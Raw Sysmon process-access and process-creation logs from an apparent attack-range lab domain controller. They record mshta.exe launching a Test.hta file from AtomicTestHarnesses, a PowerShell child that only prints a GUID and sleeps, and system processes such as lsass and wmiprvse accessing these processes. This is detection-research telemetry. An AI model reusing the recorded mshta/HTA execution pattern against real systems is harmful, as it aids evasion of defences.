15:59:13.882{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022592Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.882{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022591Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.882{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2506-00000000A301}7236C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022590Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.882{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2506-00000000A301}7236C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022589Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.882{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022588Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.882{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022587Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.867{7901BC46-5351-6008-2506-00000000A301}72367792C:\Windows\system32\conhost.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022586Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.867{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2506-00000000A301}7236C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022585Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.867{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022584Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.867{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022583Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.867{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022582Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.867{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022581Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.867{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022580Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022579Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-5351-6008-2206-00000000A301}60441872C:\Windows\System32\mshta.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000022578Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.865{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host 97e83464-b62c-4bdd-827e-3367eef7b71a; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta" 10341000x800000000000000022577Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022576Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022575Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022574Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022573Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022572Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000022571Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.864{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000022570Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022569Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2106-00000000A301}5664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022568Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-2006-00000000A301}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022567Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5350-6008-1F06-00000000A301}5864C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022566Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.851{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022565Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 